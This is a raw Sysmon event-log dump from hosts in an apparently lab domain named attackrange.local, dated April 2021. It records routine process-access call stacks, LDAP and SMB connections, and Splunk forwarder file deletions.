12:22:51.567{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440147Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.567{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440146Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.565{42DC5269-CE96-6086-0B00-00000000BA01}6283052C:\Windows\system32\lsass.exe{42DC5269-CE8E-6086-0100-00000000BA01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x8000000000000000440145Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.453{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440144Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.453{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440143Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.453{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440142Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.452{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440141Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.452{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440140Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.452{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440139Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.449{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440138Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.449{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440137Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.449{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440136Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.448{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440135Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.448{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440134Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.448{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440133Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.448{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440132Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.447{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440131Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.447{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440130Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.118{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440129Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:51.118{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291356Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:52.845{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2077D930F2179D87D1BDEAB43A5E4710,SHA256=DF6A81F1EB81B35050A803C7EF5087DDBABDB8C78C9A7A701FF0114500009593,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440160Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:50.019{42DC5269-CE8E-6086-0100-00000000BA01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local62391-truefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local445microsoft-ds 354300x8000000000000000440159Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:50.019{42DC5269-CE8E-6086-0100-00000000BA01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local62391-truefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local445microsoft-ds 354300x8000000000000000440158Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.913{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-932.attackrange.local62390-false10.0.1.14win-dc-932.attackrange.local389ldap 354300x8000000000000000440157Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.913{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62390-false10.0.1.14win-dc-932.attackrange.local389ldap 354300x8000000000000000440156Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.907{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local62389-truefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local389ldap 354300x8000000000000000440155Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:49.906{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local62389-truefe80:0:0:0:4174:ccf5:6435:e217win-dc-932.attackrange.local389ldap 23542300x8000000000000000440154Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:52.610{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9DE5DB07144D5772DA22E714636B92A,SHA256=E2110F24B6B7792362548217A6B77E3FFFE3B304C52BC0D9506C46FC429E59BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440153Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:52.470{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5CEEF2068F307BACDD98CA6C48BE2032,SHA256=E3867B39DEA3C3096FF23A1CDED89751DD16005AACD61547364157E6AA6C3378,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440152Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:52.119{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440151Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:22:52.119{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291357Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:22:53.882{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 